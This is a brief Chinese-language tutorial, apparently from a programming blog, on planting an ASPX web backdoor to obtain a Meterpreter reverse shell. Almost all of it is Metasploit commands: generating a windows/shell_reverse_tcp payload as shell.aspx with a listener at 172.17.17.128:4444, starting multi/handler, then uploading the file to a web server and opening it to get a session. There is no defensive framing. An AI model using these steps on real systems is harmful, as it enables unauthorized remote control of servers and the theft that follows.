两种使用Web后门获取Meterpreter的ASPx反弹shell方法
最编程
2024-08-04 14:54:21
...
aspx meterpreter后门与上述后门类似,首先使用下列命令调用漏洞模块,并设置相关参数
use windows/shell_reverse_tcp
set lhost 172.17.17.128
set lport 4444
generate -h 查看该模块使用方法
generate -f aspx
此时会生成一段aspx代码,把代码复制到一个文档中,命名shell.aspx。
在msf中设置监听:
set exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 172.17.17.128
set lport 4444
run
最后,将shell.aspx传入web服务器目录下,在浏览器中打开该文件,稍等片刻便能取得meterpreter。